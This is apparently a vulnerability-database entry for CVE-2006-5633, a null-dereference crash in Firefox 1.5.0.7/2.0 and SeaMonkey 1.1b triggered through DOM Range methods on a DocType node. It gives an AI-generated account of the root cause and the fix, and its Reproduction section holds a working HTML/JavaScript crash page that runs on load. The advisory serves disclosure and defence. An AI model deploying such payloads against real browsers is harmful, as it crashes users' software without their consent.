CVE-2006-5633
Description
Firefox 1.5.0.7 and 2.0, and Seamonkey 1.1b, allows remote attackers to cause a denial of service (crash) by creating a range object using createRange, calling selectNode on a DocType node (DOCUMENT_TYPE_NODE), then calling createContextualFragment on the range, which triggers a null dereference. NOTE: the original Bugtraq post mentioned that code execution was possible, but followup analysis has shown that it is only a null dereference.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
5cpe:2.3:a:mozilla:firefox:1.5.0.7:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:a:mozilla:firefox:1.5.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:mozilla:firefox:2.0:*:*:*:*:*:*:*
- cpe:2.3:a:mozilla:seamonkey:1.1:beta:*:*:*:*:*:*
Patches
Vulnerability mechanics
Root cause
"The DOM Range object does not properly handle a DocType node when creating a document fragment, leading to a null dereference."
Attack vector
A remote attacker can trigger a denial of service by crafting HTML content that utilizes JavaScript. The attacker creates a range object using `createRange`, then calls `selectNode` on a DocType node. Subsequently, calling `createContextualFragment` on this range causes the application to crash [ref_id=1]. The original advisory noted potential code execution, but later analysis confirmed it only leads to a null dereference [ref_id=1].
Affected code
The vulnerability lies within the DOM Range object's handling of nodes. Specifically, the `selectNode` method, when called with a `DOCUMENT_TYPE_NODE`, and subsequently `createContextualFragment`, triggers the issue. The fix involves changes in `nsParser.cpp` related to `ParseFragment` and its handling of `nsIFragmentContentSink` and `mParserContext` [ref_id=2].
What the fix does
The patch addresses the vulnerability by adding checks within the `nsParser::ParseFragment` function to ensure that a fragment content sink and parser context are properly initialized. If these are not available, the function now returns an error instead of proceeding, which would have previously led to a null dereference when handling malformed input related to DocType nodes [ref_id=2]. This prevents the crash by ensuring valid states before fragment parsing occurs.
Preconditions
- inputHTML content with JavaScript that creates a range object and targets a DocType node.
Reproduction
```html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <script type="text/javascript"> function do_crash() { var range; range = document.createRange(); range.selectNode(document.firstChild); range.createContextualFragment('<span></span>'); } </script> </head> <body onload="do_crash()"> <p>Good bye Firefox!</p> </body> </html> ```
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
11- lists.grok.org.uk/pipermail/full-disclosure/2006-October/050416.htmlnvdExploit
- www.gotfault.net/research/advisory/gadv-firefox.txtnvdExploitVendor Advisory
- www.securityfocus.com/archive/1/450168/100/0/threadednvdExploitVendor Advisory
- bugzilla.mozilla.org/show_bug.cginvdExploit
- bugzilla.redhat.com/bugzilla/show_bug.cginvdExploit
- www.securityfocus.com/archive/1/450155/100/0/threadednvd
- www.securityfocus.com/archive/1/450167/100/0/threadednvd
- www.securityfocus.com/archive/1/450682/100/200/threadednvd
- www.securityfocus.com/archive/1/452803/100/0/threadednvd
- www.securityfocus.com/bid/20799nvd
- exchange.xforce.ibmcloud.com/vulnerabilities/29916nvd
News mentions
0No linked articles in our index yet.